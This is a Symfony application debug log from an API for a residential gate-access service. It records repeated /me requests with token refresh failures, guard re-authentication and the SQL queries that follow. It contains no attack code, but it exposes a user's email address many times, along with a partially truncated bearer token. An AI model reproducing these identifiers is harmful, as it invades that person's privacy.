[2025-12-21 00:31:21] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:31:23] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-21 00:31:23] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 00:31:23] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:31:23] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:31:23] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:31:23] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:31:23] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:31:23] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:23] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:23] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:23] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:31:23] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:31:23] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:23] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:23] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:23] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-21 00:31:23] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:31:23] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:31:23] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-21 00:31:23] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:31:23] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
[2025-12-21 00:31:23] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:31:26] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-21 00:31:26] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 00:31:26] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:31:26] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:31:26] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:31:26] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:31:26] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:31:26] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:26] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:26] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:26] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:31:26] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:31:26] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:26] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:26] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:26] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-21 00:31:26] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:31:26] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:31:26] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-21 00:31:26] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:31:26] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
[2025-12-21 00:31:26] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:31:34] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-21 00:31:34] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 00:31:34] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:31:34] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:31:34] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:31:34] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:31:34] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:31:34] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:34] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:34] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:34] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:31:34] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:31:34] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:34] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:34] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:34] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-21 00:31:34] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:31:34] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:31:34] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-21 00:31:34] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:31:34] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
[2025-12-21 00:31:34] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:31:39] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-21 00:31:39] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 00:31:39] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:31:39] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:31:39] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:31:39] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:31:39] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:31:39] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:39] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:39] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:39] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:31:39] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:31:39] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:39] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:39] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:39] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-21 00:31:39] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:31:39] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:31:39] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-21 00:31:39] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:31:39] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
[2025-12-21 00:31:39] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:31:49] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-21 00:31:49] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 00:31:49] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:31:49] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:31:49] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:31:49] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:31:49] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:31:49] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:49] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:49] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
